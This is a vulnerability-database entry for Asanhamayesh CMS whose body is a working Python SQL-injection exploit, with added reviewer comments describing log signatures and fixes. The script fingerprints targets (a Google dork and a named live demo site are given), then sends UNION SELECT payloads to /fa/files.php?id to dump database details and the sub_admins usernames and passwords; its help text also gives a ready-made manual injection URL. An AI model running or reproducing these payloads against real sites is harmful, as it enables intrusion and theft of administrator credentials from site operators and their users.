Asanhamayesh CMS | SQL Injection - CXSecurity.com

漏洞ID 1703752 漏洞类型
发布时间 2019-08-15 更新时间 2019-08-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080058
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/python3
###########################################################################
#                          IN The Name OF God        
###########################################################################
# Title: Asanhamayesh CMS | SQL Injection
# Date: 2019-07-23                                     
# Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس)                                     
# Exploit Author: Blue Tigers
# Vendor Homepage: http://asanhamayesh.com     
# Tested on: GNU/Linux , Windows , FreeBsd , Android   
# CWE : CWE-89 (SQL Injection)
###########################################################################
# We Are : D3tect0r (AMJ) & Invisible rabbit(Mahdis) & K0uR0sH3R
###########################################################################
# Demo : http://www.med-sci.kau.ac.ir
###########################################################################
import requests
from bs4 import BeautifulSoup
import sys
# Startup banner: prints ASCII art wrapped in ANSI colour escapes
# (\033[31m red, \033[32m green, \033[33m yellow) followed by a credit line.
# It runs unconditionally, before the argument check further down, and
# performs no network activity.
print ('''\033[31m  
 █████╗ ███████╗ █████╗ ███╗   ██╗██╗  ██╗ █████╗ ███╗   ███╗ █████╗ ██╗   ██╗███████╗███████╗██╗  ██╗
██╔══██╗██╔════╝██╔══██╗████╗  ██║██║  ██║██╔══██╗████╗ ████║██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██║  ██║
███████║███████╗███████║██╔██╗ ██║███████║███████║██╔████╔██║███████║ ╚████╔╝ █████╗  ███████╗███████║
██╔══██║╚════██║██╔══██║██║╚██╗██║██╔══██║██╔══██║██║╚██╔╝██║██╔══██║  ╚██╔╝  ██╔══╝  ╚════██║██╔══██║
██║  ██║███████║██║  ██║██║ ╚████║██║  ██║██║  ██║██║ ╚═╝ ██║██║  ██║   ██║   ███████╗███████║██║  ██║
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝
        \033[32m
         ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
        ▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌
        ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ 
        ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌          
        ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ 
        ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌
        ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌
        ▐░▌          ▐░▌       ▐░▌          ▐░▌
        ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
        ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
        ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀ 
                                       
        \033[33m
▓█████ ▒██   ██▒ ██▓███   ██▓     ▒█████   ██▓▄▄▄█████▓
▓█   ▀ ▒▒ █ █ ▒░▓██░  ██▒▓██▒    ▒██▒  ██▒▓██▒▓  ██▒ ▓▒
▒███   ░░  █   ░▓██░ ██▓▒▒██░    ▒██░  ██▒▒██▒▒ ▓██░ ▒░
▒▓█  ▄  ░ █ █ ▒ ▒██▄█▓▒ ▒▒██░    ▒██   ██░░██░░ ▓██▓ ░ 
░▒████▒▒██▒ ▒██▒▒██▒ ░  ░░██████▒░ ████▓▒░░██░  ▒██▒ ░ 
░░ ▒░ ░▒▒ ░ ░▓ ░▒▓▒░ ░  ░░ ▒░▓  ░░ ▒░▒░▒░ ░▓    ▒ ░░   
 ░ ░  ░░░   ░▒ ░░▒ ░     ░ ░ ▒  ░  ░ ▒ ▒░  ▒ ░    ░    
   ░    ░    ░  ░░         ░ ░   ░ ░ ░ ▒   ▒ ░  ░      
   ░  ░ ░    ░               ░  ░    ░ ░   ░           
Created By Fri3nds Team
''')
def print_usage():
    """Write the one-line command-line usage hint to standard output."""
    usage_line = "usage : python Exploit.py http://site.com/"
    print(usage_line)
# Argument check: exactly one positional argument (the site base URL) is
# expected. With none given, the usage line is printed and the process exits
# with status 1. The argument is not validated in any way.
if len(sys.argv) < 2:
    print_usage()
    sys.exit(1)

url = sys.argv[1]
# Every request this script sends goes to this path, and the `id` query
# parameter is the only input it manipulates. For defenders this is the path
# and parameter to search for in web-server access logs.
vuln = "/fa/files.php?id=-555"
# Plain string concatenation. NOTE(review): the usage text shows a base URL
# with a trailing slash, which produces a double slash ("//fa/files.php") in
# the request path - log searches should allow for both forms.
ufv = url+vuln
# Vendor domain used as a product fingerprint on the first response.
pname = "asanhamayesh.com"

# Fingerprint probe: a single GET of the base request URL with the `requests`
# defaults (no timeout, headers or session are set here). The interactive
# loop below is entered only when the response body contains the vendor
# domain held in `pname`; otherwise the script reports the target as
# unsupported and exits.
z = requests.get(ufv)
if pname in z.text:
    print ("Connected!")
    print ("Enter 'Help' to Show Commands ")
    while True:
        # Blocking prompt; the escape code switches the terminal to red.
        opt = input ('\033[31m[root@asanhamayesh Exploit]# ')
        # NOTE(review): this is a stand-alone `if`, not part of the `elif`
        # chain that follows, so after the help text is printed 'help' also
        # reaches the final `else` and prints "Command Not Found". The hint
        # printed above says 'Help', but the comparison is case-sensitive.
        if opt == 'help' :
            print ('''
            version     Show version of database
            database    Show Databasee name
            userdb      Show Database user 
            usernames   Show Usernames of CMS
            passwords   Show Passwords of CMS
            userpass    Show Usernames with Passwords [Ex:User:password]
            dontwork    If this Exploit failed to exploit the target, enter this command
            exit        Exit From Exploit
            ''')
        # Every data command below follows the same pattern:
        #   1. append a six-column UNION SELECT to the `id` parameter, with
        #      the value of interest in column 3;
        #   2. GET the resulting URL;
        #   3. parse the HTML and print the children of the second matching
        #      <td class="col-md-9"> cell (data[1]).
        # On the server this appears as a GET for /fa/files.php whose query
        # string contains "union+select", which is usable as an access-log or
        # WAF signature. The durable fix is in the application: bind `id` as a
        # typed query parameter instead of building the SQL text from it
        # (presumably what files.php does today; its source is not shown here).
        if opt == 'version':
            try:
                payload = "+union+select+1,2,version(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print ('\033[92m' ,i)
            # Bare `except` catches everything, including KeyboardInterrupt.
            # When the first attempt raises, the identical request is sent a
            # second time and the cell is looked up with attrs={'style': ''}
            # instead. This fallback is not guarded itself, so an IndexError
            # on data[1] here terminates the script with a traceback. The
            # same try/except shape is repeated in every branch below.
            except:
                payload = "+union+select+1,2,version(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'database':
            # Same request pattern with database() in column 3.

            try:
                payload = "+union+select+1,2,database(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print ('\033[92m',i)
            except:
                payload = "+union+select+1,2,database(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'userdb':
            # Same request pattern with user() in column 3.
            try:
                payload = "+union+select+1,2,user(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print ('\033[92m',i)
            except:
                payload = "+union+select+1,2,user(),4,5,6--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'usernames':
            # Reads the `username` column of the `sub_admins` table, all rows
            # joined by group_concat. For incident response: an access-log
            # entry containing "sub_admins" means the administrator account
            # names should be treated as disclosed.
            try:
                payload = "+union+select+1,2,unhex(hex(group_concat(username))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print('\033[92m',i)
            except:
                payload = "+union+select+1,2,unhex(hex(group_concat(username))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'passwords':
            # Same as 'usernames' but for the `password` column. Whether that
            # column holds hashes or plaintext cannot be told from this
            # script; either way its contents should be treated as exposed
            # and the affected credentials rotated.
            # NOTE(review): this is the only branch whose first print omits
            # the green escape code.
            try:
                payload = "+union+select+1,2,unhex(hex(group_concat(password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print (i)
            except:
                payload = "+union+select+1,2,unhex(hex(group_concat(password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'userpass':
            # Both columns in one request; 0x3a is ':' so each row comes back
            # as "username:password", matching the example in the help text.
            try:
                payload = "+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'class':'col-md-9'})
                for i in data[1]:
                    print('\033[92m',i)
            except:
                payload = "+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+"
                up = (ufv+payload)
                r = requests.get(up)
                html = BeautifulSoup(r.content,'html.parser')
                data = html.find_all('td',attrs={'style':''})
                for i in data[1]:
                    print('\033[92m',i)
        elif opt == 'dontwork':
            # Prints static text only; no request is sent in this branch.
            print ('''\033[92m
            Well you can manually infiltrate your target
            To do this, place the bottom URL in front of the site address and manually inject the commands.
            /fa/files.php?id=-555
            In all sites the number of columns is equal to 6 and the vulnerable column is number 3.
            EX: site.com/fa/files.php?id=-555+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+
            ''')
        elif opt == 'exit':
            sys.exit()
        else:
            print ("EXP:",opt,"Command Not Found")
else:
    # Fingerprint string absent from the first response: exit without
    # sending anything further.
    print ("Exploit is not Support From This Target")
    sys.exit()